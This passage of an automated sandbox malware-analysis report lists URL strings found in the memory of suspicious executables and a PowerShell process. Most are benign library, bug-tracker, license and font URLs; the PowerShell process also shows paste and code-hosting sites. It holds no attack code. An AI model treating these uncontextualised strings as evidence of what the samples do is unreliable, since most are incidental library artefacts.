                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724disableAnisotropicFilteringDisable
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760enableShaderSubstitutionCheck
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761disableProgramCachingDisables
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8172
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280enableTranslatedShaderSubstitutionCheck
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8291
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8297
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8417
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8417uncurrentEglSurfaceUponSurfaceDestroyMake
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8484
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8503
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8611
                        Source: powershell.exe, 00000001.00000002.2312453126.000001232D139000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bitbucket.org
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2485020119.00000000057FF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://certificates.godaddy.com/repository/gd_intermediate.crt0
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2485020119.00000000057FF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://certificates.godaddy.com/repository100.
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cldr.unicode.org/index/downloads
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://code.google.com/p/python-gflags/
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://code.google.com/p/smhasher/
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crbug.com/1094869
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crbug.com/110263
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crbug.com/1144207
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crbug.com/1171371
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crbug.com/1181068
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crbug.com/1181193
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crbug.com/1420130
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crbug.com/1434317
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crbug.com/1456243
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crbug.com/308366
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crbug.com/403957
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crbug.com/550292
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crbug.com/565179
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crbug.com/642227
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crbug.com/642605
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crbug.com/644669
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crbug.com/650547
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crbug.com/672380
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crbug.com/709351
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crbug.com/797243
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crbug.com/809422
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crbug.com/830046
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crbug.com/883276
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crbug.com/927470
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crbug.com/941620
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crbug.com/941620allowTranslateUniformBlockToStructuredBufferThere
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2485020119.00000000057FF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.godaddy.com/gds1-20
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://developer.android.com/tools/extras/support-library.html
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2566452692.0000000003521000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ejemplo.com
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://git.linuxtv.org/v4l-utils.git
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://google.github.io/snappy/
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://narwhaljs.org)
                        Source: powershell.exe, 00000001.00000002.2376367107.000001233BD15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2485020119.00000000057FF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.godaddy.com/0J
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://opensource.perlig.de/rjsmin/
                        Source: powershell.exe, 00000001.00000002.2312453126.000001232BEC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 00000001.00000002.2312453126.000001232CD45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://rentry.org
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2485020119.00000000057FF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://s..
                        Source: powershell.exe, 00000001.00000002.2312453126.000001232BEC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: powershell.exe, 00000001.00000002.2312453126.000001232BCA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000001.00000002.2312453126.000001232BEC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2396268474.00000000037A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://source.android.com/
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2396268474.00000000037A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://source.android.com/compatibility)
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tukaani.org/xz/
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tukaani.org/xz/>.
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://valgrind.org
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2396268474.00000000037A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://website-archive.mozilla.org/www.mozilla.org/mpl/MPL/NPL/1.1/):
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2396268474.00000000037A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2396268474.00000000037A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                        Source: powershell.exe, 00000001.00000002.2312453126.000001232BEC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.apple.com/legal/guidelinesfor3rdparties.html.
                        Source: okdtlfsk.k4u0.exe, 00000007.00000002.2375640652.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.ecma-international.org/memento/codeofconduct.htm
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.finesse.demon.co.uk/steven/sqrt.html.
                        Source: okdtlfsk.k4u0.exe, 00000007.00000002.2375640652.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                        Source: okdtlfsk.k4u0.exe, 00000007.00000002.2375640652.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                        Source: okdtlfsk.k4u0.exe, 00000007.00000002.2375640652.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                        Source: okdtlfsk.k4u0.exe, 00000007.00000002.2375640652.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                        Source: okdtlfsk.k4u0.exe, 00000007.00000002.2375640652.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                        Source: okdtlfsk.k4u0.exe, 00000007.00000002.2375640652.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                        Source: okdtlfsk.k4u0.exe, 00000007.00000002.2375640652.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                        Source: okdtlfsk.k4u0.exe, 00000007.00000002.2375640652.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                        Source: okdtlfsk.k4u0.exe, 00000007.00000002.2375640652.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                        Source: okdtlfsk.k4u0.exe, 00000007.00000002.2375640652.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                        Source: okdtlfsk.k4u0.exe, 00000007.00000002.2375640652.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                        Source: okdtlfsk.k4u0.exe, 00000007.00000002.2375640652.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.freedesktop.org/wiki/Software/xdg-user-dirs
                        Source: okdtlfsk.k4u0.exe, 00000007.00000002.2375640652.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                        Source: okdtlfsk.k4u0.exe, 00000007.00000002.2375640652.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                        Source: okdtlfsk.k4u0.exe, 00000007.00000002.2375640652.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gutenberg.org/ebooks/53).
                        Source: okdtlfsk.k4u0.exe, 00000007.00000002.2375640652.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.linux-usb.org/usb-ids.html
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2396268474.00000000037A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/MPL/
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2396268474.00000000037A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/NPL/
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.opensource.apple.com/apsl/
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2396268474.00000000037A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.opensource.org/licenses/bsd-license.php
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pertinentdetail.org/sqrt
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.ploscompbiol.org/static/license
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.polymer-project.org
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.portaudio.com
                        Source: okdtlfsk.k4u0.exe, 00000007.00000002.2375640652.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                        Source: okdtlfsk.k4u0.exe, 00000007.00000002.2375640652.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                        Source: okdtlfsk.k4u0.exe, 00000007.00000002.2375640652.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.softsynth.com
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.suitable.com
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.suitable.com/tools/smslib.html
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.suitable.com/tools/smslib.html>
                        Source: okdtlfsk.k4u0.exe, 00000007.00000002.2375640652.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                        Source: okdtlfsk.k4u0.exe, 00000007.00000002.2375640652.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                        Source: okdtlfsk.k4u0.exe, 00000007.00000002.2375640652.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.webrtc.org
                        Source: okdtlfsk.k4u0.exe, 00000007.00000002.2375640652.0000000007132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://zlib.net/
                        Source: powershell.exe, 00000001.00000002.2312453126.000001232BCA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://android.googlesource.com/platform/external/puffin
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://android.googlesource.com/platform/external/setupdesign/
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4674
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4849
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5140
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5536
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/6574
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7161
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7246
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7246enableCaptureLimitsSet
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7308
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7319
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7320
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7369
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7382
